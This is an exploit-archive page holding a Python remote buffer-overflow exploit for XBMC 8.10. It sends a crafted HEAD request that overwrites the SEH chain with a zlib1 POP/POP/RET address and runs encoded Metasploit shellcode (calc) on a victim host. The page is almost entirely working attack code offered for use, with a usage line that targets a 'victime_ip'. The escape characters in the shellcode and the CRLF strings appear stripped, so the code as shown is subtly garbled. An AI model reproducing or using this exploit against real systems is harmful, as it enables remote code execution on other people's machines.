XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)
# Published : 2009-04-07
# Author : His0k4
# Previous Title : net2ftp <= 0.97 Cross-Site Scripting/Request Forgery Vulnerabilities
# Next Title : peterConnects Web Server Traversal Arbitrary File Access Vulnerability

#!/usr/bin/python
#[*] Usage : exploit.py [victime_ip]
#[*] Bug : 	    XBMC 8.10 (HEAD Request) Remote Buffer Overflow Exploit (SEH)
#[*] Refer :        http://www.milw0rm.com/exploits/8354
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D


import struct
import sys, socket 

host = sys.argv[1] 

buff1 = 'A'*998

Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)

###
###This was found in the module zlib1 and is universal.
#62E83BAC   5B               POP EBX
#62E83BAD   5D               POP EBP
#62E83BAE  ^E9 CDD9FFFF      JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shell_code=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x50x42x50x42x30x4bx58x45x34x4ex33x4bx58x4ex37"
"x45x30x4ax37x41x30x4fx4ex4bx38x4fx44x4ax51x4bx48"
"x4fx45x42x42x41x50x4bx4ex49x34x4bx48x46x33x4bx38"
"x41x50x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x37x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx33x46x35x46x52x46x50x45x57x45x4ex4bx38"
"x4fx55x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx54"
"x4bx38x4fx35x4ex31x41x50x4bx4ex4bx48x4ex51x4bx38"
"x41x50x4bx4ex49x58x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x36x4bx48x42x34x42x53x45x58x42x4cx4ax57"
"x4ex30x4bx38x42x54x4ex30x4bx38x42x47x4ex31x4dx4a"
"x4bx48x4ax56x4ax50x4bx4ex49x50x4bx48x42x38x42x4b"
"x42x50x42x30x42x30x4bx58x4ax56x4ex43x4fx35x41x43"
"x48x4fx42x36x48x55x49x48x4ax4fx43x58x42x4cx4bx57"
"x42x55x4ax56x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex36x43x36x42x30x5a"
)
buff2 = 'B'*635

payload = buff1 + Pointer_To_Next_SEH + SE_Handler + shell_code + buff2

head  = "HEAD /"+payload+" HTTP/1.1rn"
head += "Host: "+host+"rn"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
s.send(head + "rnrn")
s.close()

# www.Syue.com [2009-04-07]